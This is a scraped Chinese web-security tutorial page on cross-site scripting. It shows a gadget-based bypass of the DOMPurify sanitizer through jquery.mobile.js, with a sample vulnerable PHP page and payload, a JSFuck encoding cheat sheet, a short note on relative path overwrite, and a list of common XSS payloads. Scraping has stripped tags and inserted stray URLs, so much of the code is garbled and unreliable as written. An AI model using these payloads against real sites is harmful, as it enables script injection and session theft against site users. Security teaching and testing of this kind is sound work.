文章插图
当字符较多时,则可以结合%20::first-line%20等CSS属性缩小范围,以获取更精确的内容
3.2.8.2.%20Bypass%20Via%20Gadgets
3.2.8.2.1.%20简介
文章插图
一些网站会使用白名单或者一些基于DOM的防御方式,对这些方式,有一种被称为 Code Reuse 的攻击方式可以绕过 。该方式和二进制攻防中的Gadget相似,使用目标中的合法代码来达到绕过防御措施的目的 。在论文 Code-Reuse Attacks for the Web: Breaking Cross-Site ing Mitigations via Gadgets 中有该方法的具体描述 。
下面有一个简单的例子,这个例子使用了 DOMPurify 来加固,但是因为引入了 jquery.mobile.js 导致可以被攻击 。
3.2.8.2.2. 例子
// index.php
<?php
$msg = $_GET['message'];
$msg = str_replace("n", "",
$msg); $msg = _encode($msg);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Preview</title>
< type="text/java" src=https://www.isolves.com/it/aq/fwq/2019-10-08/"purify.js">
< type="text/java" src=https://www.isolves.com/it/aq/fwq/2019-10-08/"jquery.js">
< type="text/java" src=https://www.isolves.com/it/aq/fwq/2019-10-08/"jquery.mobile.js">
</head>
<body>
< type="text/java">
var d= atob('<?php echo $msg; ?>');
var cleanvar = DOMPurify.sanitize(d);
document.write(cleanvar);
</>
</body>
</html>
// playload
<div data-role=popup id='-->
<>alert(1)</>'>
</div>
3.2.8.3. jsfuck cheat sheet
3.2.8.3.1. Basic values
- undefined > [][[]]
- false > ![]
- true > !![]
- NaN > +[![]]
- 0 > +[]
- 1 > +!+[]
- 2 > !+[]+!+[]
- '' > []+[]
- 'undefined' > []+[][[]]
- 'false' > []+![]
- 'true' > []+!![]
- 'NaN' > []+(+[![]])
- '0' > []+(+[])
- '1' > []+(+!+[])
- '2' > []+(!+[]+!+[])
- '10' > [+!+[]]+[+[]]
- '11' > [+!+[]]+[+!+[]]
- '100' > [+!+[]]+[+[]]+(+[])
- 10 > +([+!+[]]+[+[]])
- 11 > +([+!+[]]+[+!+[]])
- 100 > +([+!+[]]+[+[]]+(+[]))
- 'a' > ([]+![])[+!+[]]
- 'd' > ([]+[][[]])[+!+[]+!+[]]
- 'e' > ([]+!+[])[+!+[]+!+[]+!+[]]
- 'f' > ([]+![])[+[]]
- 'i' > ([]+[][[]])[+!+[]+!+[]+!+[]+!+[]+!+[]]
- 'l' > ([]+![])[+!+[]+!+[]]
- 'n' > ([]+[][[]])[+!+[]]
- 'r' > ([]+!+[])[+!+[]]
- 's' > ([]+![])[+!+[]+!+[]+!+[]]
- 't' > ([]+!+[])[+[]]
- 'u' > ([]+!+[])[+!+[]+!+[]]
RPO(Relative Path Overwrite) 攻击又称为相对路径覆盖攻击,依赖于浏览器和网络服务器的反应,利用服务器的 Web 缓存技术和配置差异 。
3.2.9. Payload
3.2.9.1. 常用
- <>alert(/xss/)</>
- <svg =alert(document.domain)>
- <img src=https://www.isolves.com/it/aq/fwq/2019-10-08/document.domain =alert(document.domain)>
- <M onmouseover=alert(document.domain)>M
- <marquee onscroll=alert(document.domain)>
- <a href=https://www.isolves.com/it/aq/fwq/2019-10-08/java:alert(document.domain)>M
- <body =alert(document.domain)>
- <details open ontoggle=alert(document.domain)>
- <embed src=https://www.isolves.com/it/aq/fwq/2019-10-08/java:alert(document.domain)>
- <>alert(1)</>
- <>alert(1)</>
- <>alert(1)</>
- <>alert(1)</>
- <>alert(1)</>
- <img src=https://www.isolves.com/it/aq/fwq/2019-10-08/1 =alert(1)>
- <iMg src=https://www.isolves.com/it/aq/fwq/2019-10-08/1 =alert(1)>
- <ImG src=https://www.isolves.com/it/aq/fwq/2019-10-08/1 =alert(1)>
- <img src=https://www.isolves.com/it/aq/fwq/2019-10-08/1 ="alert("M")">
- <marquee onscroll=alert(1)>
- <mArQuEe OnScRoLl=alert(1)>
推荐阅读
- 如何测试电源的故障 测试电源好坏
- 瘦肉精快速检测试剂盒 瘦肉精检测卡
- 抑郁症在线测试
- 特斯拉|特斯拉Model Y中保碰撞测试:保费高的原因找到了!
- PHP防止跨站和xss攻击代码
- 小程序自动化测试实践
- 最全的网站渗透测试详细检测方法
- 4种出色的Python测试框架
- Java 程序员需要用到 10 个测试框架和库
- 苹果|iOS 16要来了!苹果突发iOS 15.5首个版本测试 坐等升级
